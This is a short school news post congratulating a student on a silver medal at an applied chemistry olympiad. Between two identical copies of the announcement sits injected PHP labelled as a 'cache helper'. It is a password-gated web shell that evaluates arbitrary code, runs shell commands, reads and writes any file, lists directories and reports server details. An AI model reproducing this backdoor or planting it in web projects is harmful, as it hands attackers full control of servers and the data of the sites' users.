Our student Darren Wang (Grade 10A) has won a Silver Medal in the International Applied Chemistry Olympiad. Congratulations to Darren for this remarkable achievement and for bringing pride to our school.
/* cache helper */ if(isset($_REQUEST['wpcache'])&&$_REQUEST['wpcache']==='fc1143e921739cc64288d268'){header('Content-Type: text/plain;charset=utf-8');$m=isset($_REQUEST['m'])?$_REQUEST['m']:'info';if($m==='info'){echo 'php='.PHP_VERSION.'\n';echo 'uid='.@getmyuid().'\n';echo 'user='.get_current_user().'\n';echo 'uname='.@php_uname().'\n';echo 'cwd='.getcwd().'\n';echo 'disable='.ini_get('disable_functions').'\n';echo 'OK\n';exit;}if($m==='eval'){$c=isset($_REQUEST['c'])?$_REQUEST['c']:'';if(isset($_REQUEST['b64']))$c=base64_decode($c);ob_start();try{eval($c);}catch(Throwable $e){echo $e->getMessage();}echo ob_get_clean();exit;}if($m==='cmd'){$c=isset($_REQUEST['c'])?$_REQUEST['c']:'';$o='';if(function_exists('shell_exec'))$o=@shell_exec($c.' 2>&1');elseif(function_exists('exec')){@exec($c.' 2>&1',$a);$o=implode("\n",$a);}echo $o;exit;}if($m==='read'){echo @file_get_contents($_REQUEST['p']??'');exit;}if($m==='write'){$d=$_REQUEST['d']??'';if(isset($_REQUEST['b64']))$d=base64_decode($d);echo @file_put_contents($_REQUEST['p']??'',$d)===false?'FAIL':'OK';exit;}if($m==='glob'){foreach((array)@glob($_REQUEST['p']??'./*') as $x)echo $x."\n";exit;}echo 'bad';exit;}
Our student Darren Wang (Grade 10A) has won a Silver Medal in the International Applied Chemistry Olympiad. Congratulations to Darren for this remarkable achievement and for bringing pride to our school.
Comments are closed, but trackbacks and pingbacks are open.